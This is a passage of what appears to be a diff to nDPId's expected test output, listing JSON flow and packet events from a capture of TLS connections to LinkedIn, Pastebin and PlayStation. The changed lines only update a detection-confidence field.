01150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482860092,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItztpAAEAGcE\/AqAGADWsqDr4OAbv2xGoh6NHEoVAYAfY2twAAFgMBAgABAAH8AwN91wMalwKbnp34VhS8QvEFPozBOcSHhaFoSNBfPba3AiDXrrHLYmT\/nToyiJxYmouQzlobVBifJMUtdUWk4ZdOUAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABB3d3cubGlua2VkaW4uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIOvcUoPBHSJ9xxKLt05ZOdwqxB4X188WUTuTKbETRNVIABcAQQSw33BhIovc8GgXm9sGLVvnRexF7f826PClnfuvUvruR3Sq4irZ9toHOp2agzdKIN0AwGPF8iqx1fv+O3\/0IjBNACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":410,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482860064,"flow_last_seen":1646482860092,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482860092,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01720{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":414,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482860064,"flow_last_seen":1646482860115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4992,"flow_avg_l4_payload_len":713,"midstream":0,"thread_ts_msec":1646482860115,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LinkedIn","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.linkedin.com","server_names":"www.linkedin.com,linkedin.com,rum5.perf.linkedin.com,exp4.www.linkedin.com,exp3.www.linkedin.com,exp2.www.linkedin.com,exp1.www.linkedin.com,rum2.perf.linkedin.com,rum4.perf.linkedin.com,rum6.perf.linkedin.com,rum17.perf.linkedin.com,rum8.perf.linkedin.com,rum9.perf.linkedin.com,afd.perf.linkedin.com,rum14.perf.linkedin.com,rum18.perf.linkedin.com,rum19.perf.linkedin.com,exp5.www.linkedin.com,realtime.www.linkedin.com,px.ads.linkedin.com,px4.ads.linkedin.com,dc.ads.linkedin.com,lnkd.in,px.jobs.linkedin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"a66ea560599a2f5c89eec8c3a0d69cee","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Sunnyvale, O=LinkedIn Corporation, CN=www.linkedin.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"CE:D8:A5:BE:BD:4B:EF:E9:22:C8:0D:55:A6:7A:A6:4A:B8:03:4A:53"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482866432,"flow_last_seen":1646482866432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482866432,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1646482866432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482866432,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sBtAAEAG\/aLAqAGAaBdivpv+AbuQtJSoAAAAAKAC+vAG0QAAAgQFtAQCCAoY1d1UAAAAAAEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1646482866449,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482866449,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkGtMZoF2K+wKgBgAG7m\/4hqZihkLSUqYAS\/\/9k2gAAAgQFeAEBBAIBAwMK"} 01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482866451,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItsB1AAEAG+6\/AqAGAaBdivpv+AbuQtJSpIamYolAYAfYUJQAAFgMBAgABAAH8AwOkCw2THMGhALk0\/S0UPYY9Fiy1MMas0dLFjf2ObmEV3iD+CRapxYYnJ+AUET5SjxVSaJRJeT\/rvI5T4N1r2TpPLQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAxwYXN0ZWJpbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg+1dFx2JbQxGMLbjHxdWGfdupB63kQdiHTmuNhsrVgTQAFwBBBKdDPqMFSChZhRpkv1Y2JjoX2aNL5O59XM1C0oY6ZFf1Ifckam\/eVu5cuFoipFrAsWBrxGiWt6uHvmWbTHpfZoYAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482866432,"flow_last_seen":1646482866451,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482866451,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01068{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":420,"source":"sites.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482866432,"flow_last_seen":1646482866473,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482866473,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"104.23.98.190","src_port":39934,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"TLS.Pastebin","breed":"Potentially Dangerous","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pastebin.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879566,"flow_last_seen":1646482879566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879566,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1646482879566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879566,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZJ5AAEAGuDfAqAGAFwFEvd\/4Abu+RY+DAAAAAKAC+vCgEQAAAgQFtAQCCAqibL0tAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1646482879585,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879585,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGI9YXAUS9wKgBgAG73\/iES9VYvkWPhKAS\/ojG\/QAAAgQFtAQCCApEcjdUomy9LQEDAwc="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879590,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZKBAAEAGtjjAqAGAFwFEvd\/4Abu+RY+EhEvVWYAYAfb4UwAAAQEICqJsvUREcjdUFgMBAgABAAH8AwPTmj1yotJrCU5Axy8WSqX4RbWM\/SINHTcC+qIJwwqdWyAtxwR2GOpVXqzss+L4QuffJNllYoSRruXn4YOMT1n2UQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAYABYAABN3d3cucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIO+m+y4kE\/Ul0wRfLnWkNqXDSHnFmA3tI1g\/5Tv\/EZwCABcAQQQh+3EFl7VEJWAHnTsK42aVbCexqYTb9DwqjdAN6Pu9IMJwjvRFdXg\/Y6aZYu3btbo89OdSMmSsifn4YkrISGSJACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879566,"flow_last_seen":1646482879590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879590,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01282{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"sites.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482879566,"flow_last_seen":1646482879608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4380,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1646482879608,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.1.68.189","src_port":57336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.playstation.com","server_names":"playstation.com,webforms.playstation.com,www.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"19e4a55cecd087d9ebf88da03db13a0f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Mateo, O=SONY INTERACTIVE ENTERTAINMENT LLC, CN=www.playstation.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"19:BC:48:84:B7:B0:91:46:45:D5:DD:3B:B5:8D:8E:45:E8:42:1A:8A"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482879964,"flow_last_seen":1646482879964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482879964,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1646482879964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879964,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nmNAAEAGzLvAqAGAFzP2QbS4AbvcfW4jAAAAAKAC+vARXQAAAgQFtAQCCAo1KzXVAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1646482879981,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482879981,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGcx8XM\/ZBwKgBgAG7tLg0LEpK3H1uJKAS\/oiOFAAAAgQFtAQCCAqG0XpXNSs11QEDAwc="} 01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482879983,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nmVAAEAGyrzAqAGAFzP2QbS4AbvcfW4kNCxKS4AYAfZhPwAAAQEICjUrNeiG0XpXFgMBAgABAAH8AwOVj3yfLLIdpS7ph9cCyv5vCYAGlSzvdrVr1N5tbcI94SDvfvqZxXeUOWdQ166wenjn8HB2CzcmnFG8kG7bSApHKAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAbABkAABZzdGF0aWMucGxheXN0YXRpb24uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AID7op1onM6THMaho0vMOrhWIG6UTS6n8xwsrP6D